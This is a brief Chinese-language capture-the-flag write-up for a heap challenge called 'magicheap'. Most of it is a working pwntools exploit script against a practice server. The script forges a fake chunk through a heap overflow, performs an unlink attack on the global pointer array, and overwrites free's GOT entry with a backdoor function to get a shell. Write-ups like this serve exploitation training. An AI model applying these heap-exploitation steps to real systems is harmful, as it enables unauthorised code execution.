1,
标准heap题目
查看下ld和libc版本:
2,
- edit功能:实现chunk溢出,伪造fake chunk
- 后门函数,覆盖got
- 安全的free:释放了heap上内存空间和指针置零
3,
条件:
edit可控溢出;
heaparray全局指针=0x6020C0;
思路:
unlink利用
poc
from pwn import *
context.log_level="debug"
r = remote("node4.buuoj.cn",26690)
elf = ELF("./magicheap")
def create(sz,content):
r.sendlineafter("choice :","1")
r.sendlineafter("Heap : ",str(sz))
r.sendlineafter("heap:",content)
def edit(idx,sz,content):
r.sendlineafter("choice :","2")
r.sendlineafter("Index :",str(idx))
r.sendlineafter("Heap : ",str(sz))
r.sendlineafter("heap : ",content)
def delete(idx):
r.sendlineafter("choice :","3")
r.sendlineafter("Index :",str(idx))
heaparray_addr = 0x6020C0
getshell_addr = elf.symbols['l33t']
free_got = elf.got['free']
create(0x90,b"aaaa")#0
create(0x90,b"bbbb")#1
create(0x20,b"cccc")#2
fake_chunk = p64(0)+p64(0x91) + p64(heaparray_addr-0x18) + p64(heaparray_addr-0x10)
fake_chunk = fake_chunk.ljust(0x90,b'a')
fake_chunk += p64(0x90) + p64(0xa0)
edit(0,0x100,fake_chunk)
delete(1) #unlink
payload = p64(0)*3 +p64(free_got)
edit(0,0x20 ,payload)
edit(0,8,p64(getshell_addr))
delete(0) #getshell
r.interactive()